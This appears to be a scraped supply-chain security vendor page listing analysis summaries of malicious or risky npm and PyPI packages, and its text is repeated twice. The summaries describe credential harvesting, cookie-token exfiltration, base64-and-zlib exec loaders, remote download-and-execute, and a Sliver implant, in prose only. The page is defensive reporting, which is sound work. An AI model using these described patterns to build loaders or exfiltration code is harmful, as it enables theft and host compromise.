Secure your dependencies. Ship with confidence.

The cog exhibits multiple high-risk execution pathways that enable arbitrary code execution, remote control, and dynamic code loading from external sources. The Redis RunRedisEval channel is a primary backdoor-like vector that can bypass owner checks if Redis is compromised. Combined with ev/eval, downloadfile, and shell, this code represents a severe supply-chain/runtime risk and should be removed or heavily sandboxed, with strict access controls and input validation. The syntax issue in export_guild further suggests maintenance fragility and potential exploitation paths. Overall, the package demonstrates malware-like behavior and warrants high security restrictions or complete replacement in any open-source distribution.

[Skill Scanner] URL pointing to executable file detected All findings: [CRITICAL] command_injection: URL pointing to executable file detected (CI010) [AITech 9.1.4] [CRITICAL] command_injection: URL pointing to executable file detected (CI010) [AITech 9.1.4] [HIGH] supply_chain: URL with free hosting platform or high-abuse TLD detected (SC007) [AITech 9.1.4] [HIGH] supply_chain: URL with free hosting platform or high-abuse TLD detected (SC007) [AITech 9.1.4] [HIGH] supply_chain: URL with free hosting platform or high-abuse TLD detected (SC007) [AITech 9.1.4] [HIGH] command_injection: Multi-step download-and-execute pattern detected (CI007) [AITech 9.1.4] [HIGH] supply_chain: URL with free hosting platform or high-abuse TLD detected (SC007) [AITech 9.1.4] This skill is malicious. It contains explicit credential harvesting, local secret-file reads (SSH private key and AWS credentials), multiple untrusted download-and-execute instructions, dynamic execution (eval), and exfiltration of sensitive data to several suspicious third-party domains using unencrypted channels. The requested capabilities are grossly disproportionate to the stated productivity purpose and match well-known supply-chain and credential-harvesting attack patterns. Do not run or install this skill; treat it as compromised/malicious. LLM verification: This skill is malicious. It contains explicit instructions and code to harvest credentials, read and exfiltrate private keys and cloud credentials, download and execute remote binaries, and send system information to attacker-controlled endpoints over unencrypted channels. It is not coherent with the stated productivity purpose and should be treated as a high-risk supply-chain malware artifact. Do not run or install; remove and block the listed domains and artifacts.

High risk: The code exhibits intentionally obfuscated, loader-like characteristics with capabilities for in-process dynamic code loading, native memory manipulation, and cross-platform (Linux/Windows) interop. While some elements could be legitimate security tooling, the prevailing patterns strongly align with malware-like behavior and supply-chain abuse risks. Recommend excluding or replacing with a transparent, auditable implementation, conducting a full dependency and payload verification, and enforcing strict build-time and run-time checks to prevent hidden code execution in downstream deployments.

There is a high-risk credential leakage pattern: client-side code reads authentication-related cookies and transmits them to an external domain via a URL query string during a redirect. This creates a credible risk of token exposure and session hijacking. Remediation should avoid sending tokens in URLs; adopt server-side token exchange, short-lived tokens, or authorization headers with strict origin controls, and remove or minimize sensitive data in client-side redirects. The presence of this pattern warrants a thorough security review of cross-domain integrations and potential refactoring to eliminate credential leakage paths.

The Python module itself is not directly implementing typical malware behaviors, but it creates a high-risk execution surface: it runs local shell scripts (some with sudo) with unvalidated inputs and passes secrets on the command line. The deploy_fdb_from_file_service function contains a command-injection vulnerability (shell=True with joined args) and a coding bug (returncod typo). Recommend: remove shell=True; use argument lists always, avoid passing secrets via argv (use stdin, environment files with proper filesystem permissions, or secured IPC), eliminate unnecessary sudo calls and require callers to provide appropriate privileges if needed, validate/escape inputs (especially file paths), fix the returncod typo, and audit all invoked shell scripts before use. Treat package as risky until mitigations and script audits are performed.

The script is a deliberate manipulation of PHP loading mechanics (autoloader removal and require_once stripping). While it could be used legitimately in constrained deployment scenarios, its combination constitutes a significant supply-chain risk by enabling non-standard loading paths, potentially concealing malicious components or bypassing integrity checks. Any deployment of this script should be rejected or accompanied by rigorous integrity validation, code review, and rollback plans.

The primary security concern is the hardcoded OAuth client secret, which poses a risk of unauthorized access. The code otherwise follows a standard OAuth flow without any indication of malicious behavior.

This code contains explicit credential handling that extracts a 'token' from document.cookie and sends it to external endpoints (api.clout.one) both as a POST FormData field and as a query parameter on a WebSocket connection. It also uploads user-selected files (or pasted/dragged files) to files.clout.one. Those data-flows represent credential forwarding and potential data exfiltration. If api.clout.one/files.clout.one are not intentionally trusted backends for the host application, this module presents a serious supply-chain/privacy risk and should be treated as malicious or at least highly suspicious. If they are legitimate endpoints the behavior is still privacy-sensitive and should be audited (why token is pulled from cookie rather than using standard auth headers, why rejectUnauthorized is false, etc.).

Live on npm for 4 hours and 20 minutes before removal. Socket users were protected even while the package was live.

The fragment demonstrates a high-risk pattern: legitimate-looking infrastructure automation interwoven with heavy obfuscation, remote payload fetches, and multiple persistent access surfaces (code-server, nginx). While some parts could be legitimate bootstrap logic, the combination of opaque payloads, diverse external downloads, and potential credential exposure warrants thorough provenance verification, strict control over dynamic code execution, and limited exposure of admin services in production. Treat as high risk until all remote content is verified and authenticated.

This module is intentionally obfuscated and constructs code at runtime using an assembled string passed to Function(...). It also embeds names referencing filesystem and local modules and contains many awaited calls and identifiers that appear to be network wrappers. Those are high-risk signs: dynamic code execution + hidden payload + potential filesystem and network activity. Treat the package as malicious or at best extremely suspicious. If this appeared as a dependency in a project, do not run it in production — remove it, perform full deobfuscation in a safe sandbox, and investigate network/file changes. Immediate remediation: isolate any environment that ran this code, rotate secrets, and audit installs for related packages.

The download_and_run_binary path enables untrusted remote code execution by downloading and immediately executing binaries without validation or sandboxing. This poses a high risk for supply-chain attacks and host compromise. To reduce risk, constrain or remove this capability, or enforce strict authentication, authorization, integrity verification (hash/signature), content-type checks, sandboxing, and isolation (e.g., run in a restricted container) before any execution. Consider removing /tmp-based persistence for downloaded payloads and using signed, auditable workflows.

This module exposes multiple high-risk capabilities: arbitrary shell execution (subprocess.run with shell=True), process spawning from untrusted input, and unrestricted filesystem modification (create, move, copy, delete) based on user-provided parameters. There are no input validations, privilege checks or limits. I assess this as not clearly malicious by intent (it implements utility functions), but it is easily abuseable and dangerous in contexts where inputs are untrusted. Treat this code as high security risk if incorporated into environments that handle external input or run with elevated privileges.

The code implements explicit client-side exfiltration of ChatGPT conversations and stored Onairos credentials to a third-party endpoint (https://api2.onairos.uk/chatgpt-sync) via a hidden-form POST in a popup created by a bookmarklet. This is high privacy risk: it transmits potentially sensitive conversation history and a locally-stored JWT to an external service. If the user trusts Onairos and explicitly consents, the behavior may be intended; otherwise treat this as malicious/unsafe. Immediate recommendations: remove hard-coded secrets from source, require clear explicit consent before reading session data or local tokens, and avoid bundling eval-enabled libraries with code that accesses sensitive session credentials. Audit the remote endpoint and operator before using.

This fragment implements immediate remote code execution by fetching text from a hardcoded external URL and passing it directly to exec(), creating a high-likelihood supply-chain/backdoor vector. Treat this code as malicious or extremely dangerous: do not import or run it in production. Replace with safe alternatives (no exec on remote content, use signed updates, sandboxing, or fetch only data). If encountered in a dependency, remove or quarantine the package and perform incident response to determine exposure.

This code fragment performs immediate, automatic exfiltration of local repository commit hash and package metadata to a hardcoded external server over plaintext HTTP, triggered on module import. The combination of synchronous shell execution at load time, hardcoded external address, mild URL obfuscation, lack of opt-out/configuration, and throwing on missing changeset are strong indicators of malicious or unauthorized telemetry/backdoor behavior for an open-source dependency. Treat this as high-risk: remove or block the package until its provenance and intent are verified, and investigate any systems that have imported/installed it.

The QueueManager contains a high-risk remote code execution sink via dynamic Function execution of untrusted message payloads. This represents a severe supply-chain/runtime security hazard. Additionally, there is a likely bug in listener dispatch and lack of input validation or sandboxing. Immediate mitigations include removing dynamic code execution, validating message schemas, implementing a strict allowlist of executed code paths, sandboxing or abandoning Function-based evaluation, and correcting listener logic. Upgrade plan should replace dynamic execution with predefined, safe handlers and add robust error handling and authentication checks.

This file is a loader that deliberately hides its payload using base64 + zlib compression and runs it immediately with exec(). That is an anti-analysis pattern and presents a high risk: the executed code could perform arbitrary and potentially malicious actions with the importing process privileges. Treat this module as untrusted until the embedded payload is decompressed and reviewed in a safe, sandboxed environment. Do not run in production or on systems holding sensitive data without prior inspection and verification.

Live on pypi for 4 days, 1 hour and 19 minutes before removal. Socket users were protected even while the package was live.

This code contains high-risk operations: unvalidated filesystem unpickling (pickle.load) and file upload into a path derived from URL components. If an attacker can control the file contents referenced by the self-test path or can exploit the upload path to place files, they can achieve remote code execution or arbitrary file write/read. Recommended actions: avoid pickle for untrusted data (use safe serialization), validate and canonicalize 'decider_name' and 'path' (reject path traversal and unexpected characters), enforce authentication/authorization on these endpoints, restrict upload locations and validate file types/sizes, and stop returning full tracebacks to clients. No obvious obfuscation or explicit hardcoded credentials found.

Live on pypi for 7 hours and 12 minutes before removal. Socket users were protected even while the package was live.

This file implements Windows RPC handlers for a remote implant/agent (Sliver) that perform high-risk offensive operations: arbitrary remote command execution, privilege manipulation (impersonation/tokens), process migration and DLL injection, service and registry manipulation, and starting pivot/listener channels. These behaviors are characteristic of a post-exploitation implant and pose a severe supply-chain and operational security risk if included as a dependency. Unless used in an intentional controlled offensive security environment, this package should be considered malicious/risky and avoided.

The module implements a high-risk pattern: it auto-downloads a helper executable from an external host (base64-encoded URL), stores it under /tmp, makes it executable, and runs it with a JSON file containing local IP/geolocation and service status. Because the downloaded binary is not validated or sandboxed, this is effectively remote code execution controlled by the remote host and represents a serious supply-chain/backdoor risk. Treat as dangerous until the downloaded artifact and domain provenance are verified.

The code is engaging in potentially malicious behavior by collecting and sending sensitive system information to an external server without user consent.

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.

The cog exhibits multiple high-risk execution pathways that enable arbitrary code execution, remote control, and dynamic code loading from external sources. The Redis RunRedisEval channel is a primary backdoor-like vector that can bypass owner checks if Redis is compromised. Combined with ev/eval, downloadfile, and shell, this code represents a severe supply-chain/runtime risk and should be removed or heavily sandboxed, with strict access controls and input validation. The syntax issue in export_guild further suggests maintenance fragility and potential exploitation paths. Overall, the package demonstrates malware-like behavior and warrants high security restrictions or complete replacement in any open-source distribution.

[Skill Scanner] URL pointing to executable file detected All findings: [CRITICAL] command_injection: URL pointing to executable file detected (CI010) [AITech 9.1.4] [CRITICAL] command_injection: URL pointing to executable file detected (CI010) [AITech 9.1.4] [HIGH] supply_chain: URL with free hosting platform or high-abuse TLD detected (SC007) [AITech 9.1.4] [HIGH] supply_chain: URL with free hosting platform or high-abuse TLD detected (SC007) [AITech 9.1.4] [HIGH] supply_chain: URL with free hosting platform or high-abuse TLD detected (SC007) [AITech 9.1.4] [HIGH] command_injection: Multi-step download-and-execute pattern detected (CI007) [AITech 9.1.4] [HIGH] supply_chain: URL with free hosting platform or high-abuse TLD detected (SC007) [AITech 9.1.4] This skill is malicious. It contains explicit credential harvesting, local secret-file reads (SSH private key and AWS credentials), multiple untrusted download-and-execute instructions, dynamic execution (eval), and exfiltration of sensitive data to several suspicious third-party domains using unencrypted channels. The requested capabilities are grossly disproportionate to the stated productivity purpose and match well-known supply-chain and credential-harvesting attack patterns. Do not run or install this skill; treat it as compromised/malicious. LLM verification: This skill is malicious. It contains explicit instructions and code to harvest credentials, read and exfiltrate private keys and cloud credentials, download and execute remote binaries, and send system information to attacker-controlled endpoints over unencrypted channels. It is not coherent with the stated productivity purpose and should be treated as a high-risk supply-chain malware artifact. Do not run or install; remove and block the listed domains and artifacts.

High risk: The code exhibits intentionally obfuscated, loader-like characteristics with capabilities for in-process dynamic code loading, native memory manipulation, and cross-platform (Linux/Windows) interop. While some elements could be legitimate security tooling, the prevailing patterns strongly align with malware-like behavior and supply-chain abuse risks. Recommend excluding or replacing with a transparent, auditable implementation, conducting a full dependency and payload verification, and enforcing strict build-time and run-time checks to prevent hidden code execution in downstream deployments.

There is a high-risk credential leakage pattern: client-side code reads authentication-related cookies and transmits them to an external domain via a URL query string during a redirect. This creates a credible risk of token exposure and session hijacking. Remediation should avoid sending tokens in URLs; adopt server-side token exchange, short-lived tokens, or authorization headers with strict origin controls, and remove or minimize sensitive data in client-side redirects. The presence of this pattern warrants a thorough security review of cross-domain integrations and potential refactoring to eliminate credential leakage paths.

The Python module itself is not directly implementing typical malware behaviors, but it creates a high-risk execution surface: it runs local shell scripts (some with sudo) with unvalidated inputs and passes secrets on the command line. The deploy_fdb_from_file_service function contains a command-injection vulnerability (shell=True with joined args) and a coding bug (returncod typo). Recommend: remove shell=True; use argument lists always, avoid passing secrets via argv (use stdin, environment files with proper filesystem permissions, or secured IPC), eliminate unnecessary sudo calls and require callers to provide appropriate privileges if needed, validate/escape inputs (especially file paths), fix the returncod typo, and audit all invoked shell scripts before use. Treat package as risky until mitigations and script audits are performed.

The script is a deliberate manipulation of PHP loading mechanics (autoloader removal and require_once stripping). While it could be used legitimately in constrained deployment scenarios, its combination constitutes a significant supply-chain risk by enabling non-standard loading paths, potentially concealing malicious components or bypassing integrity checks. Any deployment of this script should be rejected or accompanied by rigorous integrity validation, code review, and rollback plans.

The primary security concern is the hardcoded OAuth client secret, which poses a risk of unauthorized access. The code otherwise follows a standard OAuth flow without any indication of malicious behavior.

This code contains explicit credential handling that extracts a 'token' from document.cookie and sends it to external endpoints (api.clout.one) both as a POST FormData field and as a query parameter on a WebSocket connection. It also uploads user-selected files (or pasted/dragged files) to files.clout.one. Those data-flows represent credential forwarding and potential data exfiltration. If api.clout.one/files.clout.one are not intentionally trusted backends for the host application, this module presents a serious supply-chain/privacy risk and should be treated as malicious or at least highly suspicious. If they are legitimate endpoints the behavior is still privacy-sensitive and should be audited (why token is pulled from cookie rather than using standard auth headers, why rejectUnauthorized is false, etc.).

Live on npm for 4 hours and 20 minutes before removal. Socket users were protected even while the package was live.

The fragment demonstrates a high-risk pattern: legitimate-looking infrastructure automation interwoven with heavy obfuscation, remote payload fetches, and multiple persistent access surfaces (code-server, nginx). While some parts could be legitimate bootstrap logic, the combination of opaque payloads, diverse external downloads, and potential credential exposure warrants thorough provenance verification, strict control over dynamic code execution, and limited exposure of admin services in production. Treat as high risk until all remote content is verified and authenticated.

This module is intentionally obfuscated and constructs code at runtime using an assembled string passed to Function(...). It also embeds names referencing filesystem and local modules and contains many awaited calls and identifiers that appear to be network wrappers. Those are high-risk signs: dynamic code execution + hidden payload + potential filesystem and network activity. Treat the package as malicious or at best extremely suspicious. If this appeared as a dependency in a project, do not run it in production — remove it, perform full deobfuscation in a safe sandbox, and investigate network/file changes. Immediate remediation: isolate any environment that ran this code, rotate secrets, and audit installs for related packages.

The download_and_run_binary path enables untrusted remote code execution by downloading and immediately executing binaries without validation or sandboxing. This poses a high risk for supply-chain attacks and host compromise. To reduce risk, constrain or remove this capability, or enforce strict authentication, authorization, integrity verification (hash/signature), content-type checks, sandboxing, and isolation (e.g., run in a restricted container) before any execution. Consider removing /tmp-based persistence for downloaded payloads and using signed, auditable workflows.

This module exposes multiple high-risk capabilities: arbitrary shell execution (subprocess.run with shell=True), process spawning from untrusted input, and unrestricted filesystem modification (create, move, copy, delete) based on user-provided parameters. There are no input validations, privilege checks or limits. I assess this as not clearly malicious by intent (it implements utility functions), but it is easily abuseable and dangerous in contexts where inputs are untrusted. Treat this code as high security risk if incorporated into environments that handle external input or run with elevated privileges.

The code implements explicit client-side exfiltration of ChatGPT conversations and stored Onairos credentials to a third-party endpoint (https://api2.onairos.uk/chatgpt-sync) via a hidden-form POST in a popup created by a bookmarklet. This is high privacy risk: it transmits potentially sensitive conversation history and a locally-stored JWT to an external service. If the user trusts Onairos and explicitly consents, the behavior may be intended; otherwise treat this as malicious/unsafe. Immediate recommendations: remove hard-coded secrets from source, require clear explicit consent before reading session data or local tokens, and avoid bundling eval-enabled libraries with code that accesses sensitive session credentials. Audit the remote endpoint and operator before using.

This fragment implements immediate remote code execution by fetching text from a hardcoded external URL and passing it directly to exec(), creating a high-likelihood supply-chain/backdoor vector. Treat this code as malicious or extremely dangerous: do not import or run it in production. Replace with safe alternatives (no exec on remote content, use signed updates, sandboxing, or fetch only data). If encountered in a dependency, remove or quarantine the package and perform incident response to determine exposure.

This code fragment performs immediate, automatic exfiltration of local repository commit hash and package metadata to a hardcoded external server over plaintext HTTP, triggered on module import. The combination of synchronous shell execution at load time, hardcoded external address, mild URL obfuscation, lack of opt-out/configuration, and throwing on missing changeset are strong indicators of malicious or unauthorized telemetry/backdoor behavior for an open-source dependency. Treat this as high-risk: remove or block the package until its provenance and intent are verified, and investigate any systems that have imported/installed it.

The QueueManager contains a high-risk remote code execution sink via dynamic Function execution of untrusted message payloads. This represents a severe supply-chain/runtime security hazard. Additionally, there is a likely bug in listener dispatch and lack of input validation or sandboxing. Immediate mitigations include removing dynamic code execution, validating message schemas, implementing a strict allowlist of executed code paths, sandboxing or abandoning Function-based evaluation, and correcting listener logic. Upgrade plan should replace dynamic execution with predefined, safe handlers and add robust error handling and authentication checks.

This file is a loader that deliberately hides its payload using base64 + zlib compression and runs it immediately with exec(). That is an anti-analysis pattern and presents a high risk: the executed code could perform arbitrary and potentially malicious actions with the importing process privileges. Treat this module as untrusted until the embedded payload is decompressed and reviewed in a safe, sandboxed environment. Do not run in production or on systems holding sensitive data without prior inspection and verification.

Live on pypi for 4 days, 1 hour and 19 minutes before removal. Socket users were protected even while the package was live.

This code contains high-risk operations: unvalidated filesystem unpickling (pickle.load) and file upload into a path derived from URL components. If an attacker can control the file contents referenced by the self-test path or can exploit the upload path to place files, they can achieve remote code execution or arbitrary file write/read. Recommended actions: avoid pickle for untrusted data (use safe serialization), validate and canonicalize 'decider_name' and 'path' (reject path traversal and unexpected characters), enforce authentication/authorization on these endpoints, restrict upload locations and validate file types/sizes, and stop returning full tracebacks to clients. No obvious obfuscation or explicit hardcoded credentials found.

Live on pypi for 7 hours and 12 minutes before removal. Socket users were protected even while the package was live.

This file implements Windows RPC handlers for a remote implant/agent (Sliver) that perform high-risk offensive operations: arbitrary remote command execution, privilege manipulation (impersonation/tokens), process migration and DLL injection, service and registry manipulation, and starting pivot/listener channels. These behaviors are characteristic of a post-exploitation implant and pose a severe supply-chain and operational security risk if included as a dependency. Unless used in an intentional controlled offensive security environment, this package should be considered malicious/risky and avoided.

The module implements a high-risk pattern: it auto-downloads a helper executable from an external host (base64-encoded URL), stores it under /tmp, makes it executable, and runs it with a JSON file containing local IP/geolocation and service status. Because the downloaded binary is not validated or sandboxed, this is effectively remote code execution controlled by the remote host and represents a serious supply-chain/backdoor risk. Treat as dangerous until the downloaded artifact and domain provenance are verified.

The code is engaging in potentially malicious behavior by collecting and sending sensitive system information to an external server without user consent.

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.